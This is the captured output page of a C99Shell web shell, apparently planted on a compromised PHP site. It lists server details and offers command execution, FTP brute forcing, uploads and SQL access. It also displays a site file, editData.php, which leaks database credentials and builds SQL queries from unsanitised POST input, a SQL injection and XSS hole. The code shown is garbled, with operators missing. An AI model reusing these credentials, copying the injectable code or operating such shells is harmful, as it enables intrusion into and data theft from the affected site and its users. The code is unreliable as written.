!C99Shell v. 2.0 [PHP 7 Update] [25.02.2019]!

Software: nginx/1.24.0. PHP/7.3.32 

uname -a: Linux ip-172-31-28-255.ec2.internal 6.1.159-181.297.amzn2023.x86_64 #1 SMP PREEMPT_DYNAMIC
Mon Dec 22 22:31:59 UTC 2025 x86_64
 

 

Safe-mode: OFF (not secure)

/www/wwwroot/itce.co.in/studentlogin/   drwxr-xr-x
Free 30.76 GB of 49.93 GB (61.62%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     editData.php (1.5 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<input type="hidden" name="ID" value="<? echo "$ID?>"> 

<html><head><title></title></head> 
<body> 
<?php 
$con 
mysql_connect("localhost","rb!bsa838mau","baserain_db838"); 
if (!
$con

die(
'Could not connect: ' mysql_error()); 


mysql_select_db("baserain_dba838"$con);

if (isset(
$_GET["abc"])) 

$ID=$_POST['licencenr']; 
$Name $_POST['first']; 
$Telephone $_POST['mobile']; 
$Birthday $_POST['birth']; 

//Update database

$sql="UPDATE addmember 
SET name='
$Name', pan='$Telephone', occupation='$Birthday
WHERE ID = 
$ID"
$result mysql_db_query($db$sql$con); 

if (!
mysql_query($sql,$con)) 

die(
'Error: ' mysql_error()); 

else { 
echo 
"Updated successfully!"

//trying to mk the data appear into my textbox 
//mysql_close($con); 

?> 

<?php 
$query 
mysql_query ("SELECT * from members WHERE ID = $ID"); 
?> 

<table width="300" cellpadding="3" cellspacing="0" border="2"> 
<tr align="center" valign="top"> 
<td colspan="1" rowspan="1" align="center"> 
<form method="get"> 
<p> 
<input type="hidden" name="ID" value="<? echo $ID?>"> 
<p><label>Name: </label>&nbsp; 

<? echo "<input type=\"text\" name=\"Name\" value=\"$Name\">"?> 

</p> 
<p><label>Telephone: </label>&nbsp; 
<? echo "<input type=\"text\" name=\"Telephone\" value=\"$Telephone\">"?> 
</p> 
<label>Birthday: </label>&nbsp; 
<? echo "<input type=\"text\" name=\"Birthday\" value=\"$Birthday\">"?> 

<br> 
<br> 
<input name="abc" type="Submit" value="Update"> 
</p> 
</form></td></tr></table> 

</body> 
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.0 [PHP 7 Update] [25.02.2019] maintained by KaizenLouie | C99Shell Github | Generation time: 0.0017 ]--